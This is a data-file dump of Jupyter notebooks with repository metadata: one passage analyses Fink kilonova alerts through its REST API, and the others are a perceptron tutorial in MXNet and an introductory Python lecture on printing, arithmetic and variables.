unknown.\n\n\n[1] J-G Ducoin et al. “Optimizing gravitational waves follow-up using galaxies stellar mass”. In: Monthly Notices of the Royal Astronomical Society 492.4 (Jan. 2020), pp. 4768–4779. issn: 1365-2966. doi: 10.1093/mnras/staa114. url: http://dx.doi.org/10.1093/ mnras/staa114.\n\n[2] Mansi M. Kasliwal et al. “Kilonova Luminosity Function Constraints Based on Zwicky Transient Facility Searches for 13 Neutron Star Merger Triggers during O3”. In: The Astrophysical Journal 905.2 (Dec. 2020), p. 145. issn: 1538-4357. doi: 10.3847/1538- 4357/abc335. url: http://dx.doi.org/10.3847/1538-4357/abc335.", "_____no_output_____" ] ], [ [ "import os\nimport requests\n\nimport pandas as pd\nimport numpy as np\n\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\n\n# pip install fink_filters\nfrom fink_filters import __file__ as fink_filters_location\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set_context('talk')\n\nAPIURL = 'https://fink-portal.org'", "_____no_output_____" ] ], [ [ "## KN-Mangrove data\n\nLet's load the alert data from this filter:", "_____no_output_____" ] ], [ [ "pdf_kn_ma = pd.read_parquet('data/0104_3009_kn_filter2_class.parquet')\n\nnalerts_kn_ma = len(pdf_kn_ma)\nnunique_alerts_kn_ma = len(np.unique(pdf_kn_ma['objectId']))\n\nprint(\n '{} alerts loaded ({} unique objects)'.format(\n nalerts_kn_ma, \n nunique_alerts_kn_ma\n )\n)", "68 alerts loaded (59 unique objects)\n" ] ], [ [ "## Visualising the candidates\n\nFinally, let's inspect one lightcurve:", "_____no_output_____" ] ], [ [ "oid = pdf_kn_ma['objectId'].values[2]\ntns_class = pdf_kn_ma['TNS'].values[2]\nkn_trigger = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[2]\n\nr = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'withupperlim': 'True'\n }\n)\n\n# Format output in a DataFrame\npdf = pd.read_json(r.content)\n\nfig = plt.figure(figsize=(15, 6))\n\ncolordic = {1: 'C0', 2: 'C1'}\n\nfor filt in np.unique(pdf['i:fid']):\n maskFilt = pdf['i:fid'] == filt\n\n # The column `d:tag` is used to check data type\n maskValid = pdf['d:tag'] == 'valid'\n plt.errorbar(\n pdf[maskValid & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskValid & maskFilt]['i:magpsf'],\n pdf[maskValid & maskFilt]['i:sigmapsf'],\n ls = '', marker='o', color=colordic[filt]\n )\n\n maskUpper = pdf['d:tag'] == 'upperlim'\n plt.plot(\n pdf[maskUpper & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskUpper & maskFilt]['i:diffmaglim'],\n ls='', marker='^', color=colordic[filt], markerfacecolor='none'\n )\n\n maskBadquality = pdf['d:tag'] == 'badquality'\n plt.errorbar(\n pdf[maskBadquality & maskFilt]['i:jd'].apply(lambda x: x - 2400000.5),\n pdf[maskBadquality & maskFilt]['i:magpsf'],\n pdf[maskBadquality & maskFilt]['i:sigmapsf'],\n ls='', marker='v', color=colordic[filt]\n )\n\nplt.axvline(kn_trigger - 2400000.5, ls='--', color='grey')\nplt.gca().invert_yaxis()\nplt.xlabel('Modified Julian Date')\nplt.ylabel('Magnitude')\nplt.title('{}'.format(oid))\nplt.show()\nprint('{}/{}'.format(APIURL, oid))", "_____no_output_____" ] ], [ [ "Circles (●) with error bars show valid alerts that pass the Fink quality cuts. Upper triangles with errors (▲), representing alert measurements that do not satisfy Fink quality cuts, but are nevetheless contained in the history of valid alerts and used by classifiers. Lower triangles (▽), representing 5-sigma mag limit in difference image based on PSF-fit photometry contained in the history of valid alerts. The vertical line shows the KN trigger by Fink.", "_____no_output_____" ], [ "## Evolution of the classification", "_____no_output_____" ], [ "Each alert was triggered because the Fink pipelines favoured the KN flavor at the time of emission. But the underlying object on the sky might have generated further alerts after, and the classification could evolve. For a handful of alerts, let see what they became. For this, we will use the Fink REST API, and query all the data for the underlying object:", "_____no_output_____" ] ], [ [ "NALERTS = 3\noids = pdf_kn_ma['objectId'].values[0: NALERTS]\nkn_triggers = pdf_kn_ma['candidate'].apply(lambda x: x['jd']).values[0: NALERTS]\n\nfor oid, kn_trigger in zip(oids, kn_triggers):\n r = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'output-format': 'json'\n }\n )\n\n # Format output in a DataFrame\n pdf_ = pd.read_json(r.content)\n times, classes = np.transpose(pdf_[['i:jd','v:classification']].values)\n \n fig = plt.figure(figsize=(12, 5))\n \n plt.plot(times, classes, ls='', marker='o')\n plt.axvline(kn_trigger, ls='--', color='C1')\n \n plt.title(oid)\n plt.xlabel('Time (Julian Date)')\n plt.ylabel('Fink inferred classification')\n plt.show()", "_____no_output_____" ], [ "oids", "_____no_output_____" ] ], [ [ "Note that Kilonova classification does not appear here as this label is reserved to the KN-LC filter. We are working on giving a new label. \n\nOne can see that alert classification for a given object can change over time. With time, we collect more data, and have a clearer view on the nature of the object. Let's make an histogram of the final classification for each object (~1min to run)", "_____no_output_____" ] ], [ [ "final_classes = []\noids = np.unique(pdf_kn_ma['objectId'].values)\nfor oid in oids:\n r = requests.post(\n '{}/api/v1/objects'.format(APIURL),\n json={\n 'objectId': oid,\n 'output-format': 'json'\n }\n )\n pdf_ = pd.read_json(r.content)\n if not pdf_.empty:\n final_classes.append(pdf_['v:classification'].values[0])", "_____no_output_____" ], [ "fig = plt.figure(figsize=(12, 5))\n\nplt.hist(final_classes)\n\nplt.xticks(rotation=15.)\nplt.title('Final Fink classification of KN candidates');", "_____no_output_____" ] ], [ [ "Most of the objects are still unknown according to Fink.", "_____no_output_____" ], [ "## Follow-up of candidates by other instruments", "_____no_output_____" ], [ "Some of the alerts benefited from follow-up by other instruments to determine their nature. Usually this information can be found on the TNS server (although this is highly biased towards Supernovae). We attached this information to the alerts (if it exists):", "_____no_output_____" ] ], [ [ "pdf_kn_ma.groupby('TNS').count().sort_values('objectId', ascending=False)['objectId']", "_____no_output_____" ] ], [ [ "We can see that among all 53 alerts forwarded by Fink, 39 have no known counterpart in TNS (i.e. no follow-up result was reported). ", "_____no_output_____" ], [ "## Retrieving Mangrove data", "_____no_output_____" ] ], [ [ "catalog_path = os.path.join(os.path.dirname(fink_filters_location), 'data/mangrove_filtered.csv')\npdf_mangrove = pd.read_csv(catalog_path)", "_____no_output_____" ], [ "pdf_mangrove.head(2)", "_____no_output_____" ], [ "# ZTF\nra1 = pdf_kn_ma['candidate'].apply(lambda x: x['ra'])\ndec1 = pdf_kn_ma['candidate'].apply(lambda x: x['dec'])\n\n# Mangrove\ncols = ['internal_names', 'ra', 'declination', 'discoverydate', 'type']\nra2, dec2, name, lum_dist, ang_dist = pdf_mangrove['ra'], pdf_mangrove['dec'], pdf_mangrove['2MASS_name'], pdf_mangrove['lum_dist'], pdf_mangrove['ang_dist']\n\n# create catalogs\ncatalog_ztf = SkyCoord(ra=ra1.values*u.degree, dec=dec1.values*u.degree)\ncatalog_tns = SkyCoord(ra=np.array(ra2, dtype=np.float)*u.degree, dec=np.array(dec2, dtype=np.float)*u.degree)\n\n# cross-match\nidx, d2d, d3d = catalog_ztf.match_to_catalog_sky(catalog_tns)\n\npdf_kn_ma['2MASS_name'] = name.values[idx]\n\npdf_kn_ma['separation (Kpc)'] = d2d.radian * ang_dist.values[idx] * 1000\n\npdf_kn_ma['lum_dist (Mpc)'] = lum_dist.values[idx]", "/Users/julien/anaconda3/lib/python3.7/site-packages/ipykernel_launcher.py:11: DeprecationWarning: `np.float` is a deprecated alias for the builtin `float`. To silence this warning, use `float` by itself. Doing this will not modify any behavior and is safe. If you specifically wanted the numpy scalar type, use `np.float64` here.\nDeprecated in NumPy 1.20; for more details and guidance: https://numpy.org/devdocs/release/1.20.0-notes.html#deprecations\n # This is added back by InteractiveShellApp.init_path()\n" ], [ "pdf_kn_ma[['objectId', '2MASS_name', 'separation (Kpc)', 'lum_dist (Mpc)']].head(5)", "_____no_output_____" ], [ "fig = plt.figure(figsize=(12, 6))\n\nplt.hist(pdf_kn_ma['lum_dist (Mpc)'], bins=20)\n\nplt.xlabel('Luminosity distance of matching galaxies (Mpc)');", "_____no_output_____" ], [ "np.max(pdf_kn_ma['lum_dist (Mpc)'])", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
cb2090c60f5468f38cf147bb51de26ed6c075fea
176,954
ipynb
Jupyter Notebook
slides/2_7/perceptron.ipynb
yang-chenyu104/berkeley-stat-157
327f77db7ecdc02001f8b7be8c1fcaf0607694c0
[ "Apache-2.0" ]
2,709
2018-12-29T18:15:20.000Z
2022-03-31T13:24:29.000Z
slides/2_7/perceptron.ipynb
zemooooo/berkeley-stat-157
82e700596f986191ecde38f5829fb40d50a98ab4
[ "Apache-2.0" ]
7
2018-12-27T04:56:20.000Z
2021-02-18T04:43:11.000Z
slides/2_7/perceptron.ipynb
zemooooo/berkeley-stat-157
82e700596f986191ecde38f5829fb40d50a98ab4
[ "Apache-2.0" ]
1,250
2019-01-07T05:51:39.000Z
2022-03-31T13:24:18.000Z
463.230366
36,652
0.941149
[ [ [ "# The Perceptron", "_____no_output_____" ] ], [ [ "import mxnet as mx\nfrom mxnet import nd, autograd\nimport matplotlib.pyplot as plt\nimport numpy as np\nmx.random.seed(1)", "_____no_output_____" ] ], [ [ "## A Separable Classification Problem", "_____no_output_____" ] ], [ [ "# generate fake data that is linearly separable with a margin epsilon given the data\ndef getfake(samples, dimensions, epsilon):\n wfake = nd.random_normal(shape=(dimensions)) # fake weight vector for separation\n bfake = nd.random_normal(shape=(1)) # fake bias\n wfake = wfake / nd.norm(wfake) # rescale to unit length\n\n # making some linearly separable data, simply by chosing the labels accordingly\n X = nd.zeros(shape=(samples, dimensions))\n Y = nd.zeros(shape=(samples))\n\n i = 0\n while (i < samples):\n tmp = nd.random_normal(shape=(1,dimensions))\n margin = nd.dot(tmp, wfake) + bfake\n if (nd.norm(tmp).asscalar() < 3) & (abs(margin.asscalar()) > epsilon):\n X[i,:] = tmp[0]\n Y[i] = 1 if margin.asscalar() > 0 else -1\n i += 1\n return X, Y", "_____no_output_____" ], [ "# plot the data with colors chosen according to the labels\ndef plotdata(X,Y):\n for (x,y) in zip(X,Y):\n if (y.asscalar() == 1):\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='r')\n else:\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='b')\n\n# plot contour plots on a [-3,3] x [-3,3] grid \ndef plotscore(w,d):\n xgrid = np.arange(-3, 3, 0.02)\n ygrid = np.arange(-3, 3, 0.02)\n xx, yy = np.meshgrid(xgrid, ygrid)\n zz = nd.zeros(shape=(xgrid.size, ygrid.size, 2))\n zz[:,:,0] = nd.array(xx)\n zz[:,:,1] = nd.array(yy)\n vv = nd.dot(zz,w) + d\n CS = plt.contour(xgrid,ygrid,vv.asnumpy())\n plt.clabel(CS, inline=1, fontsize=10)", "_____no_output_____" ], [ "X, Y = getfake(50, 2, 0.3)\nplotdata(X,Y)\nplt.show()", "_____no_output_____" ] ], [ [ "## Perceptron Implementation", "_____no_output_____" ] ], [ [ "def perceptron(w,b,x,y):\n if (y * (nd.dot(w,x) + b)).asscalar() <= 0:\n w += y * x\n b += y\n return 1\n else:\n return 0\n\nw = nd.zeros(shape=(2))\nb = nd.zeros(shape=(1))\nfor (x,y) in zip(X,Y):\n res = perceptron(w,b,x,y)\n if (res == 1):\n print('Encountered an error and updated parameters')\n print('data {}, label {}'.format(x.asnumpy(),y.asscalar()))\n print('weight {}, bias {}'.format(w.asnumpy(),b.asscalar()))\n plotscore(w,b)\n plotdata(X,Y)\n plt.scatter(x[0].asscalar(), x[1].asscalar(), color='g')\n plt.show()", "Encountered an error and updated parameters\ndata [-2.0401056 1.482131 ], label -1.0\nweight [ 2.0401056 -1.482131 ], bias -1.0\n" ] ], [ [ "## Perceptron Convergence in Action", "_____no_output_____" ] ], [ [ "Eps = np.arange(0.025, 0.45, 0.025)\nErr = np.zeros(shape=(Eps.size))\n\nfor j in range(10):\n for (i,epsilon) in enumerate(Eps):\n X, Y = getfake(1000, 2, epsilon)\n\n for (x,y) in zip(X,Y):\n Err[i] += perceptron(w,b,x,y)\n\nErr = Err / 10.0 ", "_____no_output_____" ], [ "plt.plot(Eps, Err, label='average number of updates for training')\nplt.legend()\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb2093b665bffbcfa92ee38121ed7316089fb85d
35,893
ipynb
Jupyter Notebook
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
null
null
null
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
null
null
null
lectures/L2.ipynb
eds-uga/csci1360e-su17
605083bbdca853e4cf5772b43a2522a09f440946
[ "MIT" ]
1
2020-08-01T08:25:28.000Z
2020-08-01T08:25:28.000Z
20.771412
551
0.526704
[ [ [ "# Lecture 2: Introducing Python\n\nCSCI 1360E: Foundations for Informatics and Analytics", "_____no_output_____" ], [ "## Overview and Objectives", "_____no_output_____" ], [ "In this lecture, I'll introduce the Python programming language and how to interact with it; aka, the proverbial [Hello, World!](https://en.wikipedia.org/wiki/%22Hello,_World!%22_program) lecture. By the end, you should be able to:", "_____no_output_____" ], [ " - Recall basic history and facts about Python (relevance in scientific computing, comparison to other languages)\n - Print arbitrary strings in a Python environment\n - Create and execute basic arithmetic operations\n - Understand and be able to use variable assignment and update", "_____no_output_____" ], [ "## Part 1: Background", "_____no_output_____" ], [ "Python as a language was implemented from the start by Guido van Rossum. What was originally something of a [snarkily-named hobby project to pass the holidays](https://www.python.org/doc/essays/foreword/) turned into a huge open source phenomenon used by millions.", "_____no_output_____" ], [ "![guido](Lecture2/guido.png)", "_____no_output_____" ], [ "### Python's history", "_____no_output_____" ], [ "The original project began in 1989.", "_____no_output_____" ], [ " - Release of Python 2.0 in 2000", "_____no_output_____" ], [ " - Release of Python 3.0 in 2008", "_____no_output_____" ], [ " - Latest stable release of these branches are **2.7.12**--which Guido *emphatically* insists is the final, final, final release of the 2.x branch--and **3.5.3** (which is what we're using in this course)", "_____no_output_____" ], [ "Wondering why a 2.x branch has survived a *decade and a half* after its initial release?", "_____no_output_____" ], [ "Python 3 was designed as backwards-incompatible; a good number of syntax changes and other internal improvements made the majority of code written for Python 2 unusable in Python 3.", "_____no_output_____" ], [ "This made it difficult for power users and developers to upgrade, particularly when they relied on so many third-party libraries for much of the heavy-lifting in Python.", "_____no_output_____" ], [ "Until these third-party libraries were themselves converted to Python 3 (really only in the past couple years!), most developers stuck with Python 2.", "_____no_output_____" ], [ "### Python, the Language", "_____no_output_____" ], [ "Python is an **intepreted** language.", "_____no_output_____" ], [ "Contrast with **compiled** languages like C, C++, and Java.", "_____no_output_____" ], [ "In practice, the distinction between **interpreted** and **compiled** has become blurry, particularly in the past decade.", "_____no_output_____" ], [ " - Interpreted languages *in general* are easier to use but run more slowly and consume more resources", "_____no_output_____" ], [ " - Compiled languages *in general* have a higher learning curve for programming, but run much more efficiently", "_____no_output_____" ], [ "As a consequence of these advantages and disadvantages, modern programming languages have attempted to combine the best of both worlds:", "_____no_output_____" ], [ " - Java is initially compiled into bytecode, which is then run through the Java Virtual Machine (JVM) which acts as an interpreter. In this sense, it is both a compiled language and an interpreted language.", "_____no_output_____" ], [ " - Python runs on a reference implementation, CPython, in which chunks of Python code are compiled into intermediate representations and executed.", "_____no_output_____" ], [ " - [Julia](http://julialang.org/), a relative newcomer in programming languages designed for scientific computing and data science, straddles a middle ground in a different way: using a \"just-in-time\" (JIT) compilation scheme, whereby code is compiled *as the program runs*, theoretically providing the performance of compiled programs with the ease of use of interpreted programs. JIT compilers have proliferated for other languages as well, including Python (but these are well beyond the scope of this course; take CSCI 4360 if interested!)", "_____no_output_____" ], [ "Python is a very **general** language.", "_____no_output_____" ], [ " - Not designed as a specialized language for performing a specific task. Instead, it relies on third-party developers to provide these extras.", "_____no_output_____" ], [ "![xkcd](Lecture2/python.png)", "_____no_output_____" ], [ "Instead, as [Jake VanderPlas](http://jakevdp.github.io/) put it:", "_____no_output_____" ], [ "> \"Python syntax is the glue that holds your data science code together. As many scientists and statisticians have found, Python excels in that role because it is powerful, intuitive, quick to write, fun to use, and above all extremely useful in day-to-day data science tasks.\"", "_____no_output_____" ], [ "### Zen of Python", "_____no_output_____" ], [ "One of the biggest reasons for Python's popularity is its overall simplicity and ease of use.", "_____no_output_____" ], [ "Python was designed *explicitly* with this in mind!", "_____no_output_____" ], [ "It's so central to the Python ethos, in fact, that it's baked into every Python installation. Tim Peters wrote a \"poem\" of sorts, *The Zen of Python*, that anyone with Python installed can read.", "_____no_output_____" ], [ "To see it, just type one line of Python code (yes, this is *live Python code*):", "_____no_output_____" ] ], [ [ "import this", "The Zen of Python, by Tim Peters\n\nBeautiful is better than ugly.\nExplicit is better than implicit.\nSimple is better than complex.\nComplex is better than complicated.\nFlat is better than nested.\nSparse is better than dense.\nReadability counts.\nSpecial cases aren't special enough to break the rules.\nAlthough practicality beats purity.\nErrors should never pass silently.\nUnless explicitly silenced.\nIn the face of ambiguity, refuse the temptation to guess.\nThere should be one-- and preferably only one --obvious way to do it.\nAlthough that way may not be obvious at first unless you're Dutch.\nNow is better than never.\nAlthough never is often better than *right* now.\nIf the implementation is hard to explain, it's a bad idea.\nIf the implementation is easy to explain, it may be a good idea.\nNamespaces are one honking great idea -- let's do more of those!\n" ] ], [ [ "Lack of any discernible meter or rhyming scheme aside, it nonetheless encapsulates the spirit of the Python language. These two lines are particular favorites of mine:", "_____no_output_____" ], [ " If the implementation is hard to explain, it's a bad idea.\n If the implementation is easy to explain, it may be a good idea.", "_____no_output_____" ], [ "Line 1:\n - If you wrote the code and can't explain it\\*, go back and fix it.\n - If you didn't write the code and can't explain it, get the person who wrote it to fix it.", "_____no_output_____" ], [ "Line 2:\n - \"Easy to explain\": necessary and sufficient for good code?", "_____no_output_____" ], [ "Don't you just feel so zen right now?", "_____no_output_____" ], [ "\\* Lone exception to this rule: **code golf**", "_____no_output_____" ], [ "![codegolf](Lecture2/codegolf.png)", "_____no_output_____" ], [ "![codegolf_solution](Lecture2/codegolf_solution.png)", "_____no_output_____" ], [ "The goal of *code golf* is to write a program that achieves a certain objective **using as few characters as possible**.", "_____no_output_____" ], [ "The result is the complete gibberish you see in this screenshot. Fun for competitive purposes; insanely *not*-useful for real-world problems.", "_____no_output_____" ], [ "## Part 2: Hello, World!", "_____no_output_____" ], [ "Enough reading, time for some coding, amirite?", "_____no_output_____" ] ], [ [ "print(\"Hello, world!\")", "Hello, world!\n" ] ], [ [ "Yep! That's all there is to it.", "_____no_output_____" ], [ "Just for the sake of being thorough, though, let's go through this command in painstaking detail.", "_____no_output_____" ], [ "**Functions**: `print()` is a function.", "_____no_output_____" ], [ " - Functions take input, perform an operation on it, and give back (return) output.", "_____no_output_____" ], [ "You can think of it as a direct analog of the mathematical term, $f(x) = y$. In this case, $f()$ is the function; $x$ is the input, and $y$ is the output. \nLater in the course, we'll see how to create our own functions, but for now we'll make use of the ones Python provides us by default.", "_____no_output_____" ], [ "**Arguments**: the input to the function.", "_____no_output_____" ], [ " - Interchangeable with \"parameters\".", "_____no_output_____" ], [ "In this case, there is only one argument to `print()`: a string of text that we want printed out. This text, in Python parlance, is called a \"string\". I can only presume it is so named because it is a *string* of individual characters.", "_____no_output_____" ], [ "We can very easily change the argument we pass to `print()`:", "_____no_output_____" ] ], [ [ "print(\"This is not the same argument as before.\")", "This is not the same argument as before.\n" ] ], [ [ "We could also print out an empty string, or even no string at all.", "_____no_output_____" ] ], [ [ "print(\"\") # this is an empty string", "\n" ], [ "print() # this is just nothing", "\n" ] ], [ [ "In both cases, the output looks pretty much the same...because it is: just a blank line.", "_____no_output_____" ], [ " - After `print()` finishes printing your input, it prints one final character--a *newline*.", "_____no_output_____" ], [ "This is basically the programmatic equivalent of hitting `Enter` at the end of a line, moving the cursor down to the start of the next line.", "_____no_output_____" ], [ "### What are \"strings\"?", "_____no_output_____" ], [ "Briefly--a type of data format in Python that exclusively uses alphanumeric (A through Z, 0 through 9) characters.", "_____no_output_____" ], [ "Look for the double-quotes!", "_____no_output_____" ] ], [ [ "\"5\" # This is a string.\n5 # This is NOT a string.", "_____no_output_____" ] ], [ [ "### What are the hashtags? (`#`)", "_____no_output_____" ], [ "Delineators for *comments*.", "_____no_output_____" ], [ " - Comments are lines in your program that the language ignores entirely.", "_____no_output_____" ], [ " - When you type a `#` in Python, everything *after* that symbol on the same line is ignored by Python.", "_____no_output_____" ], [ "They're there purely for the developers as a way to put documentation and clarifying statements directly into the code. It's a practice I **strongly** encourage everyone to do--even just to remind yourself what you were thinking! I can't count the number of times I worked on code, set it aside for a month, then came back to it and had absolutely no idea what I was doing)", "_____no_output_____" ], [ "## Part 3: Beyond \"Hello, World!\"", "_____no_output_____" ], [ "Ok, so Python can print strings. That's cool. Can it do anything that's actually useful?", "_____no_output_____" ], [ "Python has a lot of built-in objects and data structures that are very useful for more advanced operations--and we'll get to them soon enough!--but for now, you can use Python to perform basic arithmetic operations.", "_____no_output_____" ], [ "Addition, subtraction, multiplication, division--they're all there. You can use it as a glorified calculator:", "_____no_output_____" ] ], [ [ "3 + 4", "_____no_output_____" ], [ "3 - 4", "_____no_output_____" ], [ "3 * 4", "_____no_output_____" ], [ "3 / 4", "_____no_output_____" ] ], [ [ "Python respects order of operations, too, performing them as you'd expect:", "_____no_output_____" ] ], [ [ "3 + 4 * 6 / 2 - 5", "_____no_output_____" ], [ "(3 + 4) * 6 / (2 - 5)", "_____no_output_____" ] ], [ [ "Python even has a really cool exponent operator, denoted by using two stars right next to each other:", "_____no_output_____" ] ], [ [ "2 ** 3 # 2 raised to the 3rd power", "_____no_output_____" ], [ "3 ** 2 # 3 squared", "_____no_output_____" ], [ "25 ** (1 / 2) # Square root of 25", "_____no_output_____" ] ], [ [ "Now for something really neat:", "_____no_output_____" ] ], [ [ "x = 2\nx * 3", "_____no_output_____" ] ], [ [ "This is an example of using Python *variables*.", "_____no_output_____" ], [ " - Variables store and maintain values that can be updated and manipulated as the program runes.", "_____no_output_____" ], [ " - You can name a variable whatever you like, as long as it doesn't start with a number (\"`5var`\" would be illegal, but \"`var5`\" would be fine) or conflict with reserved Python words (like `print`).", "_____no_output_____" ], [ "Here's an operation that involves two variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx * y", "_____no_output_____" ] ], [ [ "We can assign the result of operations with variables to other variables:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nz = x * y\nprint(z)", "6\n" ] ], [ [ "The use of the equals sign `=` is called the *assignment operator*.", "_____no_output_____" ], [ " - \"Assignment\" takes whatever value is being computed on the right-hand side of the equation and *assigns* it to the variable on the left-hand side.", "_____no_output_____" ], [ " - Multiplication (`*`), Division (`/`), Addition (`+`), and Subtraction (`-`) are also *operators*.", "_____no_output_____" ], [ "What happens if I perform an assignment on something that can't be assigned a different value...such as, say, a number?", "_____no_output_____" ] ], [ [ "x = 2\ny = 3", "_____no_output_____" ], [ "5 = x * y", "_____no_output_____" ] ], [ [ "**CRASH!**", "_____no_output_____" ], [ "Ok, not really; Python technically did what it was supposed to do. It threw an error, alerting you that something in your program didn't work for some reason. In this case, the error message is `can't assign to literal`.", "_____no_output_____" ], [ "Parsing out the `SyntaxError` message:", "_____no_output_____" ], [ " - `Error` is an obvious hint. `Syntax` gives us some context.", "_____no_output_____" ], [ " - We did something wrong that involves Python's syntax, or the structure of its language.", "_____no_output_____" ], [ "The \"`literal`\" being referred to is the number 5 in the statement: `5 = x * y`", "_____no_output_____" ], [ " - We are attempting to assign the result of the computation of `x * y` to the number 5", "_____no_output_____" ], [ " - However, 5 is known internally to Python as a \"literal\"", "_____no_output_____" ], [ " - 5 is literally 5; you can't change the value of 5! (5 = 8? NOPE)", "_____no_output_____" ], [ "So we can't assign values to numbers. What about assigning values to a variable that's used in the very same calculation?", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx = x * y\nprint(x)", "6\n" ] ], [ [ "This works just fine! In fact, it's more than fine--this is such a standard operation, it has its own operator:", "_____no_output_____" ] ], [ [ "x = 2\ny = 3\nx *= y\nprint(x)", "6\n" ] ], [ [ "Out loud, it's pretty much what it sounds like: \"x times equals y\".", "_____no_output_____" ], [ "This is an instance of a shorthand operator.", "_____no_output_____" ], [ " - We multiplied `x` by `y` and stored the product in `x`, effectively updating it.", "_____no_output_____" ], [ " - There are many instances where you'll want to increment a variable: for example, when counting how many of some \"thing\" you have.", "_____no_output_____" ], [ " - All the other operators have the same shorthand-update versions: `+=` for addition, `-=` for subtraction, and `/=` for division.", "_____no_output_____" ], [ "## Review Questions", "_____no_output_____" ], [ "1: Let's say you want to count the number of words in Wikipedia. You have a variable to track this count: `word_count = 0`. For every word you come across, you'll update this counter by 1. Using the shorthand you saw before, what would the command be to update the variable at each word?\n\n2: What would happen if I ran this command? Explain. `(\"5\" + 5)`\n\n3: In this lecture, we used what is essentially a Python shell in order to execute Python commands. Let's say, instead, we wanted to run a sequence of commands in a script. I've put a couple commands in the file `commands.py`. How would you execute this script from the command prompt?\n\n4: What would happen if I ran this command? Explain. `x = y`", "_____no_output_____" ], [ "## Course Administrivia", "_____no_output_____" ], [ " - If you haven't done so yet, please **let me know to what email address you'd like me to send a Slack invite.** If I haven't heard from you by Thursday morning, I'll use your UGA address.", "_____no_output_____" ], [ " - Please check out the revamped [course website](https://eds-uga.github.io/csci1360e-su17/) if you have questions; it should have pretty much all the information you need about the course!", "_____no_output_____" ], [ " - Assignment 0 comes out tomorrow! It doesn't have a deadline, but is instead an introduction to using JupyterHub. Please go through it, as we'll be using JupyterHub all semester for both homeworks AND exams!", "_____no_output_____" ], [ "## Additional Resources\n\n 1. Guido's PyCon 2016 talk on the future of Python: https://www.youtube.com/watch?v=YgtL4S7Hrwo\n 2. VanderPlas, Jake. *Python Data Science Handbook*. 2016 (pre-release).", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb209563fbdac1ad3f981957b857012cd5d978e9
4,680
ipynb
Jupyter Notebook
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
Python-Programming/Python-3-Bootcamp/02-Python Statements/.ipynb_checkpoints/06-List Comprehensions-checkpoint.ipynb
vivekparasharr/Learn-Programming
1ae07ef5143bff3c504978e1d375698820f59af0
[ "MIT" ]
null
null
null
21.46789
201
0.483333
